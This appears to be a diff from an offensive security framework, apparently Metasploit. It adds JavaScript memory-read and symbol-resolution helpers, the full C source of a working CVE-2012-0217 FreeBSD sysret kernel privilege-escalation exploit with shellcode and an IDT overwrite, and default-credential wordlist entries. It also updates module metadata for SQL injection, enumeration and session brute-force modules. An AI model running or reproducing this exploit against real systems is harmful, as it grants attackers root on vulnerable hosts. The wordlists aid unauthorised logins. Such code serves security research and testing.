+function off2addr(segs, off)
+{
+    if(!(off instanceof Int64)) off = new Int64(off);
+    for(var i = 0; i < segs.length; ++i)
+    {
+        var start = segs[i].fileoff;
+        var end   = Add(start, segs[i].size);
+        if
+        (
+            (start.hi() < off.hi() || (start.hi() == off.hi() && start.lo() <= off.lo())) &&
+            (end.hi() > off.hi() || (end.hi() == off.hi() && end.lo() > off.lo()))
+        )
+        {
+            return Add(segs[i].addr, Sub(off, start));
+        }
+    }
+    return new Int64("0x4141414141414141");
+}
+
+function fsyms(mem, base, segs, want, syms)
+{
+    want = Array.from(want); // copy
+    if(syms === undefined)
+    {
+        syms = {};
+    }
+
+    var stab = null;
+    var ncmds = mem.u32(Add(base, 0x10));
+    for(var i = 0, off = 0x20; i < ncmds; ++i)
+    {
+        var cmd = mem.u32(Add(base, off));
+        if(cmd == 0x2) // LC_SYMTAB
+        {
+            var b = mem.read(Add(base, off + 0x8), 0x10);
+            stab =
+            {
+                symoff:  b2u32(b.slice(0x0, 0x4)),
+                nsyms:   b2u32(b.slice(0x4, 0x8)),
+                stroff:  b2u32(b.slice(0x8, 0xc)),
+                strsize: b2u32(b.slice(0xc, 0x10)),
+            };
+            break;
+        }
+        off += mem.u32(Add(base, off + 0x4));
+    }
+    if(stab == null)
+    {
+        fail("stab");
+    }
+    var tmp = { base: off2addr(segs, stab.stroff), off: 0 };
+    var fn = function(i)
+    {
+        return mem.read(Add(tmp.base, tmp.off + i), 1)[0];
+    };
+    for(var i = 0; i < stab.nsyms && want.length > 0; ++i)
+    {
+        tmp.off = mem.u32(off2addr(segs, stab.symoff + i * 0x10));
+        for(var j = 0; j < want.length; ++j)
+        {
+            var s = want[j];
+            if((strcmp(fn, s)))
+            {
+                syms[s] = mem.readInt64(off2addr(segs, stab.symoff + i * 0x10 + 0x8));
+                want.splice(j, 1);
+                break;
+            }
+        }
+    }
+    return syms;
+}
+
+function strcmp(b, str)
+{
+    var fn = typeof b == "function" ? b : function(i) { return b[i]; };
+    for(var i = 0; i < str.length; ++i)
+    {
+        if(fn(i) != str.charCodeAt(i))
+        {
+            return false;
+        }
+    }
+    return fn(str.length) == 0;
+}
+
+function _u32(i)
+{
+    return b2u32(this.read(i, 4));
+}
+
+function _read(i, l)
+{
+    if (i instanceof Int64) i = i.lo();
+    if (l instanceof Int64) l = l.lo();
+    if (i + l > this.length)
+    {
+        fail(`OOB read: ${i} -> ${i + l}, size: ${l}`);
+    }
+    return this.slice(i, i + l);
+}
+
+function _readInt64(addr)
+{
+    return new Int64(this.read(addr, 8));
+}
+
+function _writeInt64(i, val)
+{
+    if (i instanceof Int64) i = i.lo();
+    this.set(val.bytes(), i);
+}
+
+
 // Simplified version of the similarly named python module.
 var Struct = (function() {
    // Allocate these once to avoid unecessary heap allocations during pack/unpack operations.
@@ -0,0 +1,345 @@
+// CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)
+// Copyright 2012 all right reserved, not for commercial uses, bitches
+// Infringement Punishment: Monkeys coming out of your ass Bruce Almighty style.
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdint.h>
+#include <unistd.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/utsname.h>
+#include <machine/cpufunc.h>
+#define _WANT_UCRED
+#include <sys/proc.h>
+#include <machine/segments.h>
+#include <sys/param.h>
+#include <sys/linker.h>
+
+uintptr_t Xofl_ptr, Xbnd_ptr, Xill_ptr, Xdna_ptr, Xpage_ptr, Xfpu_ptr, Xalign_ptr, Xmchk_ptr, Xxmm_ptr;
+
+struct gate_descriptor * sidt()
+{
+	struct region_descriptor idt;
+
+	asm ("sidt %0": "=m"(idt));
+
+	return (struct gate_descriptor*)idt.rd_base;
+} 
+
+u_long get_symaddr(char *symname)
+{
+	struct kld_sym_lookup ksym;
+
+	ksym.version = sizeof (ksym);
+	ksym.symname = symname;
+
+	if (kldsym(0, KLDSYM_LOOKUP, &ksym) < 0) {
+		perror("kldsym");
+		exit(1);
+	}
+	printf("    [+] Resolved %s to %#lx\n", ksym.symname, ksym.symvalue);
+	return ksym.symvalue;
+}
+
+// Code taken from amd64/amd64/machdep.c
+void setidt(struct gate_descriptor *idt, int idx, uintptr_t func, int typ, int dpl, int ist)
+{
+	struct gate_descriptor *ip;
+
+	ip = idt + idx;
+	ip->gd_looffset = func;
+	ip->gd_selector = GSEL(GCODE_SEL, SEL_KPL);
+	ip->gd_ist = ist;
+	ip->gd_xx = 0;
+	ip->gd_type = typ;
+	ip->gd_dpl = dpl;
+	ip->gd_p = 1;
+	ip->gd_hioffset = func>>16;
+}
+
+void shellcode()
+{
+	// Actually we dont really need to spawn a shell since we
+	// changed our whole cred struct.
+	// Just exit...
+	printf("[*] Got root!\n");
+	exit(0);
+}
+
+void kernelmodepayload()
+{
+	struct thread *td;
+	struct ucred *cred;
+
+	// We need to restore/recover whatever we smashed
+	// We inititalized rsp to idt[14] + 10*8, i.e. idt[19] (see trigger())
+	// The #GP exception frame writes 6*64bit registers, i.e. it overwrites
+	// idt[18], idt[17] and idt[16]
+	// thus overall we have:
+	// - idt[18], idt[17] and idt[16] are trashed
+	// - tf_addr -> overwrites the 64bit-LSB of idt[15]
+	// - tf_trapno -> overwrites Target Offset[63:32] of idt[14]
+	// - rdi -> overwrites the 64bit-LSB of idt[7]
+	// - #PF exception frame overwrites idt[6], idt[5] and idt[4]
+	struct gate_descriptor *idt = sidt();
+	setidt(idt, IDT_OF, Xofl_ptr, SDT_SYSIGT, SEL_KPL, 0); // 4
+	setidt(idt, IDT_BR, Xbnd_ptr, SDT_SYSIGT, SEL_KPL, 0); // 5
+	setidt(idt, IDT_UD, Xill_ptr, SDT_SYSIGT, SEL_KPL, 0); // 6
+	setidt(idt, IDT_NM, Xdna_ptr, SDT_SYSIGT, SEL_KPL, 0); // 7
+	setidt(idt, IDT_PF, Xpage_ptr, SDT_SYSIGT, SEL_KPL, 0); // 14
+	setidt(idt, IDT_MF, Xfpu_ptr, SDT_SYSIGT, SEL_KPL, 0); // 15
+	setidt(idt, IDT_AC, Xalign_ptr, SDT_SYSIGT, SEL_KPL, 0); // 16
+	setidt(idt, IDT_MC, Xmchk_ptr, SDT_SYSIGT, SEL_KPL, 0); // 17
+	setidt(idt, IDT_XF, Xxmm_ptr, SDT_SYSIGT, SEL_KPL, 0); // 18
+
+	// get the thread pointer
+	asm ("mov %%gs:0, %0" : "=r"(td));
+
+	// The Dark Knight Rises
+	cred = td->td_proc->p_ucred;
+	cred->cr_uid = cred->cr_ruid = cred->cr_rgid = 0;
+	cred->cr_groups[0] = 0;
+
+	// return to user mode to spawn the shell
+	asm ("swapgs; sysretq;" :: "c"(shellcode)); // store the shellcode addr to rcx
+}
+
+#define TRIGGERCODESIZE 20
+#define TRAMPOLINECODESIZE 18
+
+void trigger()
+{
+	printf("[*] Setup...\n");
+	// Allocate one page just before the non-canonical address
+	printf("    [+] Trigger code...\n");
+	uint64_t pagesize = getpagesize();
+	uint8_t * area = (uint8_t*)((1ULL << 47) - pagesize);
+	area = mmap(area, pagesize,
+		PROT_READ | PROT_WRITE | PROT_EXEC,
+		MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0);
+	if (area == MAP_FAILED) {
+		perror("mmap (trigger)");
+		exit(1);
+	}
+
+	// Copy the trigger code at the end of the page
+	// such that the syscall instruction is at its
+	// boundary
+	char triggercode[] =
+		"\xb8\x18\x00\x00\x00" // mov rax, 24; #getuid
+		"\x48\x89\xe3" // mov rbx, rsp; save the user's stack for later
+		"\x48\xbc\xbe\xba\xfe\xca\xde\xc0\xad\xde" // mov rsp, 0xdeadc0decafebabe
+		"\x0f\x05"; // syscall
+
+	uint8_t * trigger_addr = area + pagesize - TRIGGERCODESIZE;
+	memcpy(trigger_addr, triggercode, TRIGGERCODESIZE);
+
+	// There are two outcomes given a target rsp:
+	// - if rsp can't be written to, a double fault is triggered
+	//   (Xdblfault defined in sys/amd64/amd64/exception.S)
+	//   and the exception frame is pushed to a special stack
+	// - otherwise a #GP is triggered
+	//	 (Xprot defined in sys/amd64/amd64/exception.S)
+	//   and the exception frame is pushed to [rsp]
+	//
+	// In the latter case, trouble is... #GP triggers a page fault
+	// (Xpage):
+	//  IDTVEC(prot)
+	//  	subq	$TF_ERR,%rsp
+	//  [1]	movl	$T_PROTFLT,TF_TRAPNO(%rsp)
+	//  [2]	movq	$0,TF_ADDR(%rsp)
+	//  [3]	movq	%rdi,TF_RDI(%rsp)	/* free up a GP register */
+	//  	leaq	doreti_iret(%rip),%rdi
+	//  	cmpq	%rdi,TF_RIP(%rsp)
+	//  	je	1f			/* kernel but with user gsbase!! */
+	//  [4]	testb	$SEL_RPL_MASK,TF_CS(%rsp) /* Did we come from kernel? */
+	//  	jz	2f			/* already running with kernel GS.base */
+	//  1:	swapgs
+	//  2:	movq	PCPU(CURPCB),%rdi [5]
+	//
+	// [4] sets the Z flag because we come from the kernel (while executing sysret)
+	// and we therefore skip swapgs. But GS is in fact the user GS.base! Indeed
+	// it was restored just before calling sysret...
+	// Thus, [5] triggers a pagefault while trying to access gs:data
+	// If we don't do anything we'll eventually doublefault, tripplefault etc. and crash
+	//
+	// We therefore need a way: (1) to recover from the GP, (2) to clean
+	// any mess we did. Both could be solved if we can get get an arbitrary
+	// code execution by the time we reach [5] (NB: this is not mandatory, we could
+	// get the code execution later down the fault trigger chain)
+	//
+	// So... here is the idea: wouldn't it be nice if we could overwrite the
+	// page fault handler's address and therefore get code execution when [5]
+	// triggers the #PF?
+	//
+	// For reference:
+	// Gate descriptor:
+	// +0: Target Offset[15:0] | Target Selector
+	// +4: Some stuff | Target Offset[31:16]
+	// +8: Target Offset[63:32]
+	// +12: Stuff
+	//
+	// and from include/frame.h:
+	//  struct trapframe {
+	//  	register_t	tf_rdi;
+	//  	register_t	tf_rsi;
+	//  	register_t	tf_rdx;
+	//  	register_t	tf_rcx;
+	//  	register_t	tf_r8;
+	//  	register_t	tf_r9;
+	//  	register_t	tf_rax;
+	//  	register_t	tf_rbx;
+	//  	register_t	tf_rbp;
+	//  	register_t	tf_r10;
+	//  	register_t	tf_r11;
+	//  	register_t	tf_r12;
+	//  	register_t	tf_r13;
+	//  	register_t	tf_r14;
+	//  	register_t	tf_r15;
+	//  	uint32_t	tf_trapno;
+	//  	uint16_t	tf_fs;
+	//  	uint16_t	tf_gs;
+	//  	register_t	tf_addr;
+	//  	uint32_t	tf_flags;
+	//  	uint16_t	tf_es;
+	//  	uint16_t	tf_ds;
+	//  	/* below portion defined in hardware */
+	//  	register_t	tf_err;
+	//  	register_t	tf_rip;
+	//  	register_t	tf_cs;
+	//  	register_t	tf_rflags;
+	//  	register_t	tf_rsp;
+	//  	register_t	tf_ss;
+	//  };
+	//
+	// When the exception is triggered, the hardware pushes
+	// ss, rsp, rflags, cs, rip and err
+	//
+	// We can see that [1], [2] and [3] write to the stack
+	// [3] is fully user-controlled through rdi, so we could try to align
+	// rsp such that [3] overwrites the offset address
+	//
+	// The trouble is... rsp is 16byte aligned for exceptions. We can
+	// therefore only overwrite the first 32-LSB of the offset address
+	// (check how rdi is 16byte aligned in this trapframe)
+	//
+	// [2] writes 0 to tf_addr which is also 16byte aligned. So no dice.
+	// That leaves us with [1] which writes T_PROTFLT (0x9) to tf_trapno
+	// and tf_trapno is 16byte aligned + 8!
+	// This enables us to set Target Offset[63:32] to 0x9
+	//
+	// We set rsp to &idt[14] + 10 * 8 (to align tf_trapno with Offset[63:32])
+	*(uint64_t*)(trigger_addr + 10) = (uint64_t)(((uint8_t*)&sidt()[14]) + 10 * 8);
+	// Hence, the #PF handler's address is now 0x9WWXXYYZZ
+	// Furthermore, WWXXYYZZ is known since we can get (see get_symaddr()) the #PF's address
+	// Thus, the idea is to setup a trampoline code at 0x9WWXXYYZZ which does
+	// some setup and jump to our kernel mode code
+	printf("    [+] Trampoline code...\n");
+	char trampolinecode[] =
+		"\x0f\x01\xf8" // swapgs; switch back to the kernel's GS.base
+		"\x48\x89\xdc" // mov rsp, rbx; restore rsp, it's enough to use the user's stack
+		"\x48\xb8\xbe\xba\xfe\xca\xde\xc0\xad\xde" // mov rax, 0xdeadc0decafebabe
+		"\xff\xe0"; // jmp rax
+
+	uint8_t * trampoline = (uint8_t*)(0x900000000 | (Xpage_ptr & 0xFFFFFFFF));
+	size_t trampoline_allocsize = pagesize;
+	// We round the address to the PAGESIZE for the allocation
+	// Not enough space for the trampoline code ?
+	if ((uint8_t*)((uint64_t)trampoline & ~(pagesize-1)) + pagesize < trampoline + TRAMPOLINECODESIZE)
+		trampoline_allocsize += pagesize;
+	if (mmap((void*)((uint64_t)trampoline & ~(pagesize-1)), trampoline_allocsize,
+		PROT_READ | PROT_WRITE | PROT_EXEC,
+		MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0) == MAP_FAILED)
+	{
+		perror("mmap (trampoline)");
+		exit(1);
+	}
+	memcpy(trampoline, trampolinecode, TRAMPOLINECODESIZE);
+	*(uint64_t*)(trampoline + 8) = (uint64_t)kernelmodepayload;
+	// Call it
+	printf("[*] Fire in the hole!\n");
+	((void (*)())trigger_addr)();
+}
+
+typedef struct validtarget
+{
+	char * sysname;
+	char * release;
+	char * machine;
+} validtarget_t;
+
+int validate_target(char * sysname, char * release, char * machine)
+{
+	validtarget_t targets[] = {
+		{ "FreeBSD", "8.3-RELEASE", "amd64" },
+		{ "FreeBSD", "9.0-RELEASE", "amd64" },
+		{ 0, 0, 0 }
+	};
+
+	int found = 0;
+	int i = 0;
+
+	while (!found && targets[i].sysname) {
+		found = !strcmp(targets[i].sysname, sysname)
+			&& !strcmp(targets[i].release, release)
+			&& !strcmp(targets[i].machine, machine);
+		++i;
+	}
+	return found;
+}
+
+void get_cpu_vendor(char * cpu_vendor)
+{
+	u_int regs[4];
+
+	do_cpuid(0, regs);
+   ((u_int *)cpu_vendor)[0] = regs[1];
+   ((u_int *)cpu_vendor)[1] = regs[3];
+   ((u_int *)cpu_vendor)[2] = regs[2];
+   cpu_vendor[12] = '\0';
+}
+
+int is_intel()
+{
+	char cpu_vendor[13];
+
+	get_cpu_vendor(cpu_vendor);
+	return !strcmp(cpu_vendor, "GenuineIntel");
+}
+
+int main(int argc, char *argv[])
+{
+	printf("CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)\n\n");
+
+	printf("[*] Retrieving host information...\n");
+	char cpu_vendor[13];
+	get_cpu_vendor(cpu_vendor);
+	struct utsname ver;
+	uname(&ver);
+	printf("    [+] CPU: %s\n", cpu_vendor);
+	printf("    [+] sysname: %s\n", ver.sysname);
+	printf("    [+] release: %s\n", ver.release);
+	printf("    [+] version: %s\n", ver.version);
+	printf("    [+] machine: %s\n", ver.machine);
+	printf("[*] Validating target OS and version...\n");
+	if (!is_intel() || !validate_target(ver.sysname, ver.release, ver.machine)) {
+		printf("    [+] NOT Vulnerable :-(\n");
+		exit(1);
+	} else
+		printf("    [+] Vulnerable :-)\n");
+	// Prepare the values we'll need to restore the kernel to a stable state
+	printf("[*] Resolving kernel addresses...\n");
+	Xofl_ptr = (uintptr_t)get_symaddr("Xofl");
+	Xbnd_ptr = (uintptr_t)get_symaddr("Xbnd");
+	Xill_ptr = (uintptr_t)get_symaddr("Xill");
+	Xdna_ptr = (uintptr_t)get_symaddr("Xdna");
+	Xpage_ptr = (uintptr_t)get_symaddr("Xpage");
+	Xfpu_ptr = (uintptr_t)get_symaddr("Xfpu");
+	Xalign_ptr = (uintptr_t)get_symaddr("Xalign");
+	Xmchk_ptr = (uintptr_t)get_symaddr("Xmchk");
+	Xxmm_ptr = (uintptr_t)get_symaddr("Xxmm");
+	// doeet!
+	trigger();
+	return 0;
+}
+
@@ -0,0 +1,4 @@
+244+0000009999
+188+030000
+19b+00000F
+19b+000010
@@ -4,3 +4,4 @@ root
 Administrator
 USERID
 guest
+Admin
@@ -405,6 +405,7 @@ root realtek
 root root
 root tini
 root tslinux
+root ubnt
 root user
 root vizxv
 root wyse
@@ -44,7 +44,7 @@ apc
 bintec
 blue
 c
-cable-d
+cable-docsis
 canon_admin
 cc
 cisco
@@ -364,7 +364,7 @@
    "author": [
      "wvu <wvu@metasploit.com>"
    ],
-    "description": "This module acts as a simple remote control for Chromecast YouTube.",
+    "description": "This module acts as a simple remote control for Chromecast YouTube.\n\n        Only the deprecated DIAL protocol is supported by this module.\n        Casting via the newer CASTV2 protocol is unsupported at this time.",
    "references": [
      "URL-http://www.google.com/intl/en/chrome/devices/chromecast/index.html"
    ],
@@ -387,7 +387,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-05-29 12:19:52 +0000",
    "path": "/modules/auxiliary/admin/chromecast/chromecast_youtube.rb",
    "is_install_path": true,
    "ref_name": "admin/chromecast/chromecast_youtube",
@@ -956,7 +956,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-05-21 15:52:32 +0000",
    "path": "/modules/auxiliary/admin/http/allegro_rompager_auth_bypass.rb",
    "is_install_path": true,
    "ref_name": "admin/http/allegro_rompager_auth_bypass",
@@ -3789,6 +3789,49 @@
      ]
    }
  },
+  "auxiliary_admin/http/wp_google_maps_sqli": {
+    "name": "WordPress Google Maps Plugin SQL Injection",
+    "full_name": "auxiliary/admin/http/wp_google_maps_sqli",
+    "rank": 300,
+    "disclosure_date": "2019-04-02",
+    "type": "auxiliary",
+    "author": [
+      "Thomas Chauchefoin (Synacktiv)"
+    ],
+    "description": "This module exploits a SQL injection vulnerability in a REST endpoint\n        registered by the WordPress plugin wp-google-maps between 7.11.00 and\n        7.11.17 (included).\n\n        As the table prefix can be changed by administrators, set DB_PREFIX\n        accordingly.",
+    "references": [
+      "CVE-2019-10692",
+      "WPVDB-9249"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2019-04-15 07:06:27 +0000",
+    "path": "/modules/auxiliary/admin/http/wp_google_maps_sqli.rb",
+    "is_install_path": true,
+    "ref_name": "admin/http/wp_google_maps_sqli",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    }
+  },
  "auxiliary_admin/http/wp_symposium_sql_injection": {
    "name": "WordPress Symposium Plugin SQL Injection",
    "full_name": "auxiliary/admin/http/wp_symposium_sql_injection",
@@ -4053,7 +4096,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 04:43:37 +0000",
    "path": "/modules/auxiliary/admin/misc/wol.rb",
    "is_install_path": true,
    "ref_name": "admin/misc/wol",
@@ -5033,7 +5076,7 @@

    ],
    "targets": null,
-    "mod_time": "2018-09-15 18:54:45 +0000",
+    "mod_time": "2019-05-24 23:56:27 +0000",
    "path": "/modules/auxiliary/admin/oracle/oracle_login.rb",
    "is_install_path": true,
    "ref_name": "admin/oracle/oracle_login",
@@ -6138,7 +6181,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2019-01-09 06:32:22 +0000",
+    "mod_time": "2019-05-22 20:05:44 +0000",
    "path": "/modules/auxiliary/admin/smb/ms17_010_command.rb",
    "is_install_path": true,
    "ref_name": "admin/smb/ms17_010_command",
@@ -6183,7 +6226,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2019-01-09 06:32:22 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/admin/smb/psexec_command.rb",
    "is_install_path": true,
    "ref_name": "admin/smb/psexec_command",
@@ -7006,7 +7049,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2019-02-12 13:29:52 +0000",
+    "mod_time": "2019-03-04 19:25:56 +0000",
    "path": "/modules/auxiliary/admin/wemo/crockpot.rb",
    "is_install_path": true,
    "ref_name": "admin/wemo/crockpot",
@@ -7081,7 +7124,7 @@

    ],
    "targets": null,
-    "mod_time": "2019-02-03 10:24:05 +0000",
+    "mod_time": "2019-03-21 20:54:32 +0000",
    "path": "/modules/auxiliary/analyze/apply_pot.rb",
    "is_install_path": true,
    "ref_name": "analyze/apply_pot",
@@ -7115,7 +7158,7 @@

    ],
    "targets": null,
-    "mod_time": "2019-01-30 16:24:05 +0000",
+    "mod_time": "2019-03-21 20:54:32 +0000",
    "path": "/modules/auxiliary/analyze/jtr_aix.rb",
    "is_install_path": true,
    "ref_name": "analyze/jtr_aix",
@@ -7149,7 +7192,7 @@

    ],
    "targets": null,
-    "mod_time": "2019-01-30 16:24:05 +0000",
+    "mod_time": "2019-03-21 20:54:32 +0000",
    "path": "/modules/auxiliary/analyze/jtr_linux.rb",
    "is_install_path": true,
    "ref_name": "analyze/jtr_linux",
@@ -7183,7 +7226,7 @@

    ],
    "targets": null,
-    "mod_time": "2019-01-30 16:24:05 +0000",
+    "mod_time": "2019-03-21 20:54:32 +0000",
    "path": "/modules/auxiliary/analyze/jtr_mssql_fast.rb",
    "is_install_path": true,
    "ref_name": "analyze/jtr_mssql_fast",
@@ -7217,7 +7260,7 @@

    ],
    "targets": null,
-    "mod_time": "2019-01-30 16:24:05 +0000",
+    "mod_time": "2019-03-21 20:54:32 +0000",
    "path": "/modules/auxiliary/analyze/jtr_mysql_fast.rb",
    "is_install_path": true,
    "ref_name": "analyze/jtr_mysql_fast",
@@ -7251,7 +7294,7 @@

    ],
    "targets": null,
-    "mod_time": "2019-02-03 14:31:58 +0000",
+    "mod_time": "2019-03-21 20:54:32 +0000",
    "path": "/modules/auxiliary/analyze/jtr_oracle_fast.rb",
    "is_install_path": true,
    "ref_name": "analyze/jtr_oracle_fast",
@@ -7284,7 +7327,7 @@

    ],
    "targets": null,
-    "mod_time": "2019-01-30 16:24:05 +0000",
+    "mod_time": "2019-03-21 20:54:32 +0000",
    "path": "/modules/auxiliary/analyze/jtr_postgres_fast.rb",
    "is_install_path": true,
    "ref_name": "analyze/jtr_postgres_fast",
@@ -7317,7 +7360,7 @@

    ],
    "targets": null,
-    "mod_time": "2019-01-30 16:24:05 +0000",
+    "mod_time": "2019-03-21 20:54:32 +0000",
    "path": "/modules/auxiliary/analyze/jtr_windows_fast.rb",
    "is_install_path": true,
    "ref_name": "analyze/jtr_windows_fast",
@@ -7387,7 +7430,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-08-24 21:38:44 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/bnat/bnat_scan.rb",
    "is_install_path": true,
    "ref_name": "bnat/bnat_scan",
@@ -7810,7 +7853,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb",
    "is_install_path": true,
    "ref_name": "dos/dhcp/isc_dhcpd_clientid",
@@ -8122,7 +8165,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-04-25 23:08:19 +0000",
    "path": "/modules/auxiliary/dos/http/apache_range_dos.rb",
    "is_install_path": true,
    "ref_name": "dos/http/apache_range_dos",
@@ -8645,7 +8688,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2018-11-18 12:40:09 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb",
    "is_install_path": true,
    "ref_name": "dos/http/ms15_034_ulonglongadd",
@@ -9990,7 +10033,7 @@
    ],
    "platform": "",
    "arch": "",
-    "rport": null,
+    "rport": 80,
    "autofilter_ports": [

    ],
@@ -9998,7 +10041,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-08-24 21:38:44 +0000",
+    "mod_time": "2019-03-06 17:42:27 +0000",
    "path": "/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb",
    "is_install_path": true,
    "ref_name": "dos/ssl/dtls_changecipherspec",
@@ -10491,7 +10534,6 @@
      "BID-36273",
      "OSVDB-57753",
      "MSB-MS09-053",
-      "URL-https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx",
      "URL-http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html"
    ],
    "platform": "",
@@ -10505,7 +10547,7 @@
      "ftp"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-05-23 07:01:21 +0000",
    "path": "/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb",
    "is_install_path": true,
    "ref_name": "dos/windows/ftp/iis_list_exhaustion",
@@ -11128,8 +11170,7 @@
      "BID-36299",
      "OSVDB-57799",
      "MSB-MS09-050",
-      "URL-https://seclists.org/fulldisclosure/2009/Sep/0039.html",
-      "URL-http://www.microsoft.com/technet/security/advisory/975497.mspx"
+      "URL-https://seclists.org/fulldisclosure/2009/Sep/0039.html"
    ],
    "platform": "",
    "arch": "",
@@ -11141,7 +11182,7 @@

    ],
    "targets": null,
-    "mod_time": "2018-09-15 18:54:45 +0000",
+    "mod_time": "2019-05-23 07:01:21 +0000",
    "path": "/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb",
    "is_install_path": true,
    "ref_name": "dos/windows/smb/ms09_050_smb2_negotiate_pidhigh",
@@ -11853,7 +11894,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb",
    "is_install_path": true,
    "ref_name": "fuzzers/ftp/ftp_pre_post",
@@ -13414,7 +13455,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 04:43:03 +0000",
    "path": "/modules/auxiliary/gather/corpwatch_lookup_id.rb",
    "is_install_path": true,
    "ref_name": "gather/corpwatch_lookup_id",
@@ -13456,7 +13497,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-08-26 08:43:10 +0000",
+    "mod_time": "2019-03-05 04:43:03 +0000",
    "path": "/modules/auxiliary/gather/corpwatch_lookup_name.rb",
    "is_install_path": true,
    "ref_name": "gather/corpwatch_lookup_name",
@@ -14148,7 +14189,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2019-01-10 19:19:14 +0000",
+    "mod_time": "2019-05-29 22:36:50 +0000",
    "path": "/modules/auxiliary/gather/http_pdf_authors.rb",
    "is_install_path": true,
    "ref_name": "gather/http_pdf_authors",
@@ -14203,6 +14244,52 @@
    "notes": {
    }
  },
+  "auxiliary_gather/ibm_bigfix_sites_packages_enum": {
+    "name": "IBM BigFix Relay Server Sites and Package Enum",
+    "full_name": "auxiliary/gather/ibm_bigfix_sites_packages_enum",
+    "rank": 300,
+    "disclosure_date": "2019-03-18",
+    "type": "auxiliary",
+    "author": [
+      "HD Moore",
+      "Chris Bellows",
+      "Ryan Hanson",
+      "Jacob Robles"
+    ],
+    "description": "This module retrieves masthead, site, and available package information\n        from IBM BigFix Relay Servers.",
+    "references": [
+      "CVE-2019-4061",
+      "URL-https://www.atredis.com/blog/2019/3/18/harvesting-data-from-bigfix-relay-servers"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 52311,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2019-03-19 12:53:27 +0000",
+    "path": "/modules/auxiliary/gather/ibm_bigfix_sites_packages_enum.rb",
+    "is_install_path": true,
+    "ref_name": "gather/ibm_bigfix_sites_packages_enum",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    }
+  },
  "auxiliary_gather/ibm_sametime_enumerate_users": {
    "name": "IBM Lotus Notes Sametime User Enumeration",
    "full_name": "auxiliary/gather/ibm_sametime_enumerate_users",
@@ -15207,6 +15294,123 @@
    "notes": {
    }
  },
+  "auxiliary_gather/nuuo_cms_bruteforce": {
+    "name": "Nuuo Central Management Server User Session Token Bruteforce",
+    "full_name": "auxiliary/gather/nuuo_cms_bruteforce",
+    "rank": 300,
+    "disclosure_date": "2018-10-11",
+    "type": "auxiliary",
+    "author": [
+      "Pedro Ribeiro <pedrib@gmail.com>"
+    ],
+    "description": "Nuuo Central Management Server below version 2.4 has a flaw where it sends the\n        heap address of the user object instead of a real session number when a user logs\n        in. This can be used to reduce the keyspace for the session number from 10 million\n        to 1.2 million, and with a bit of analysis it can be guessed in less than 500k tries.\n        This module does exactly that - it uses a computed occurence table to try the most common\n        combinations up to 1.2 million to try to guess a valid user session.\n        This session number can then be used to achieve code execution or download files - see\n        the other Nuuo CMS auxiliary and exploit modules.\n        Note that for this to work a user has to be logged into the system.",
+    "references": [
+      "CVE-2018-17888",
+      "URL-https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02",
+      "URL-https://seclists.org/fulldisclosure/2019/Jan/51",
+      "URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": 5180,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2019-04-24 07:01:42 +0000",
+    "path": "/modules/auxiliary/gather/nuuo_cms_bruteforce.rb",
+    "is_install_path": true,
+    "ref_name": "gather/nuuo_cms_bruteforce",
+    "check": false,
+    "post_auth": false,
